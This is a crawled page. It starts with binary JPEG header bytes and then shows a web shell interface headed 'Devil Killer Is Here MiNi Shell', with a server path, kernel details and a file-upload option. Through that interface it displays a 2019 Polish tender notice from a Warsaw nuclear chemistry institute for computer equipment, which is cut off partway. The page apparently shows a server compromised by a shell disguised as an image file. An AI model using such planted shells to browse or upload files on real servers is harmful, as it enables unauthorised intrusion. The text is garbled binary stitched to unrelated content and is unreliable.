JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190820/587982-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 587982-N-2019 z dnia 2019-08-20 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Instytut Chemii i Techniki Jądrowej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zawarcie umowy ramowej na dostawę i/lub na zakup komputerów, sprzętu komputerowego, akcesoriów komputerowych, licencjonowanego oprogramowania systemowego, biurowego, specjalistycznego i użytkowego oraz materiałów eksploatacyjnych do drukarek i faksów wg bieżących potrzeb Instytutu Chemii i Techniki Jądrowej przez okres trzech lat od daty zawarcia umowy ramowej</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zawarcia umowy ramowej</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Instytut Chemii i Techniki Jądrowej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Dorodna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">16</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">03-195</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon"></span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">sursek@ichtj.waw.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ichtj.waw.pl </span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Postępowanie o udzielenie niniejszego zamówienia prowadzi się z zachowaniem formy pisemnej </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Instytut Chemii i Techniki Jądrowej, ul. Dorodna 16 bud. 37 pok. 39, 03-195 Warszawa </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zawarcie umowy ramowej na dostawę i/lub na zakup komputerów, sprzętu komputerowego, akcesoriów komputerowych, licencjonowanego oprogramowania systemowego, biurowego, specjalistycznego i użytkowego oraz materiałów eksploatacyjnych do drukarek i faksów wg bieżących potrzeb Instytutu Chemii i Techniki Jądrowej przez okres trzech lat od daty zawarcia umowy ramowej</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP/5/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Umowa ramowa, której wzór zawarty jest w Załączniku Nr 4 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) stanowiącym jej integralną część, zostanie zawarta:1)	z Wykonawcami, których oferty uzyskają największą liczbę punktów w kryterium ,,łączna cena brutto oferty", o którym jest mowa w Rozdziale XV SIWZ, nie mniejszą jednak niż 80 pkt.;2)	na okres 3 lat licząc od daty jej zawarcia, w związku z art. 100 ust. 1 ustawy.2.	Umowa ramowa swoim zakresem przedmiotowym obejmować będzie dostawy i/lub zakupy dostosowane do potrzeb oraz działalności Zamawiającego, tj. dostawy i/lub zakupy: 1)	komputerów i sprzętu komputerowego oraz akcesoriów komputerowych, tj.:a)	komputerów i sprzętu komputerowego (Grupa 1A), w szczególności: komputerów stacjonarnych, komputerów przenośnych i stacji dokowania, serwerów sprzętowych, monitorów do komputerów i serwerów, podzespołów komputerowych (np.: procesorów, płyt głównych, pamięci komputerowych, dysków twardych, napędów wewnętrznych, zasilaczy, kart sieciowych), klawiatur i myszy komputerowych, obudów, napędów zewnętrznych, czytników, kontrolerów, adapterów, głośników, ups-ów, drukarek, urządzeń wielofunkcyjnych, skanerów stacjonarnych i przenośnych, ploterów, kamer internetowych, projektorów, rzutników, ekranów wielkoformatowych, itp.,b)	akcesoriów komputerowych (Grupa 1B), w szczególności płyt cd/dvd/blu-ray, toreb i plecaków do komputerów przenośnych, podkładek pod mysz, baterii/akumulatorów, pendrivów, listew zasilających, ładowarek, kabli sygnałowych i zasilających, przedłużaczy, słuchawek, wskaźników, materiałów do konserwacji komputerów i sprzętu komputerowego, itp.;Komputery i sprzęt komputerowy i akcesoria komputerowe, muszą posiadać na indywidualnych opakowaniach logo producenta, nazwę (typ, symbol) wyrobu, numer katalogowy, opis zawartości.2)	licencjonowanego oprogramowania systemowego, biurowego, specjalistycznego i użytkowego (Grupa 2) dla dostaw którego wymaga się aby Wykonawca posiadał uprawnienia do sprzedaży oprogramowania z licencją edukacyjną przynajmniej wydane przez MathWorks, Microsoft, Adobe, Origin, Statistica, Symantec, ESET oraz dostawy słowników języków obcych, subskrypcji automap, itp.;3)	materiałów eksploatacyjnych do drukarek i faksów (Grupa 3), które obejmować będą dostawę tonerów, tuszy, w szczególności tonerów zapewniających w wydrukach;a)	monochromatycznych: strona A4 - 5% pokrycie zgodnie z normą ISO/IEC 19752 (lub równoważną),b)	kolorowych: strona A4 - 20% pokrycie (po 5% na każdy kolor składowy: czarny, cyjan, magenta, żółty) zgodnie z normą ISO/IEC 19798 (lub równoważną),dla wydajności wskazanych przez producentów drukarek.Materiały eksploatacyjne dla drukarek nowych, będą zamawiane w oryginale, fabrycznie nowe, nienoszące śladów uszkodzeń zewnętrznych i uprzedniego używania oraz nie mogą być regenerowane. Materiały eksploatacyjne muszą posiadać na opakowaniach indywidualnych logo producenta, nazwę (typ, symbol) materiału, numer katalogowy, opis zawartości, informację o dacie produkcji lub dacie upływu gwarancji, a ich użycie nie może powodować utraty gwarancji dla danego urządzenia.Dalszy szczegółowy opis przedmiotu zamówienia zawiera SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30200000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30000000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30100000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>31000000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32000000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>48000000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">900000,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">36</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">W odniesieniu do SEKCJA I: ZAMAWIAJĄCY pkt. I.1) NAZWA I ADRES: DODAJE SIĘ w polu Krajowy numer identyfikacyjny - Zamawiający uzupełnia wpis o numer REGON: 001024020; DODAJE SIĘ w polu tel. wpis: (+48) 22 504 12 20; DODAJE SIĘ w polu fax wpis: (+48) 22 811 19 17</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający wymaga, aby Wykonawca wykazał spełnienie niniejszego warunku udziału w postępowaniu w następujący sposób:1)	poprzez złożenie wraz z ofertą (art. 25a ust. 1 ustawy) w zakresie niniejszego warunku oświadczenia/eń (wg Wzoru zawartego w Załączniku Nr 3A do SIWZ) aktualnego/ych na dzień składania ofert. Informacje zawarte w powyższym/ych oświadczeniu/ach stanowić będą wstępne potwierdzenie, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu;2)	i poprzez posiadanie i złożenie Zamawiającemu (w terminie wyznaczonym w trakcie postępowania w wezwaniu Zamawiającego - zgodnie z art. 26 ust. 2 ustawy) aktualnego/ych i obowiązującego/ych na dzień złożenia, zezwolenia/eń na prowadzenie działalności w zakresie zbierania i transportu tych zużytych materiałów eksploatacyjnych lub zwolnienia z uzyskania tego zezwolenia/eń zgodnie z obowiązującą ustawą z dnia 14 grudnia 2012 roku o odpadach (Dz. U. z 2013 r., poz. 21, z późn. zm.), ważnego/ych co najmniej przez okres 6 miesięcy od zakończenia trwania umowy ramowej zawartej z Zamawiającym. Informacje zawarte w złożonym/ych zezwoleniu/eniach stanowić będą udokumentowane potwierdzenie, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu w ww. zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow">3)	Dodatkowe informacje:a)	Wykonawca zgodnie z zapisami zawartymi w VI Rozdziale SIWZ w ust. 3 pkt. 1 musi również posiadać w okresie wykonywania całego zamówienia aktualne zezwolenie/nia, i przedłożyć je Zamawiającemu przed podpisaniem umowy ramowej,b)	w przypadku oferty składnej wspólnie przez kilku Wykonawców ubiegających się o udzielenie zamówienia niniejszy warunek udziału w postępowaniu Wykonawcy mogą spełnić wspólnie w taki sposób, ze działalność wymagająca posiadanie ww. w zakresie zbierania i transportu tych zużytych materiałów eksploatacyjnych lub zwolnienia z uzyskania tego zezwolenia/eń może być wykazana poprzez złożenie ww. zezwolenia przez tego/tych Wykonawcę/ów, który/rzy będzie/będą wykonywał/li czynność/ci w procesie realizacji zamówienia, co do których wymagane jest posiadanie ww. zezwoleniac)	wstępnie potwierdzająca ocena, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu zostanie dokonana przez Zamawiającego na postawie złożonego/ych przez Wykonawcę wraz z ofertą wymaganego/ych ww. oświadczenia/eń (Załącznik Nr 3A do SIWZ), na zasadzie spełnia: spełnia - nie spełnia,d)	następnie ocena potwierdzająca, że Wykonawca spełnia warunek udziału w postępowaniu w zakresie wymaganego/ych wezwaniem Zamawiającego w trakcie postępowania oświadczenia/eń lub dokumentu/ów (zgodnie z art. 26 ust. 2 ustawy), zostanie dokonana na zasadzie: spełnia - nie spełnia,e)	Wykonawca nie może w celu wykazania spełnienia tego warunku udziału w postępowaniu skorzystać z zasobów innych podmiotów (w związku z art. 22a ust. 1 ustawy). </span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający wymaga, aby Wykonawca wykazał spełnienie niniejszego warunku udziału w postępowaniu w następujący sposób:1)	poprzez złożenie wraz z ofertą (art. 25a ust. 1 ustawy) w zakresie niniejszego warunku oświadczenia/eń (wg Wzoru zawartego w Załączniku Nr 3A do SIWZ) aktualnego/ych na dzień składania ofert. Informacje zawarte w powyższym/ych oświadczeniu/ach stanowić będą wstępne potwierdzenie, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu;2)	i poprzez posiadanie i złożenie Zamawiającemu (w terminie wyznaczonym w trakcie postępowania w wezwaniu Zamawiającego - zgodnie z art. 26 ust. 2 ustawy) aktualnego/ych na dzień złożenia dokumentu/ów potwierdzającego/ych, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (kontraktowej i deliktowej) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w kwocie minimum 300 000,00 zł. Informacje zawarte w złożonym/ych dokumencie/tach stanowić będą udokumentowane potwierdzenie, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu w ww. zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe">3)	Dodatkowe informacje:a)	do przeliczenia na PLN (zł) wartości wskazanej w dokumencie/tach złożonym/ch na potwierdzenie spełnienia niniejszego warunku udziału w postępowaniu, wyrażonej w walutach innych niż PLN (zł), Zamawiający przyjmie średni kurs publikowany przez Narodowy Bank Polski z dnia wszczęcia postępowania,b)	w przypadku oferty składnej wspólnie przez kilku Wykonawców ubiegających się o udzielenie 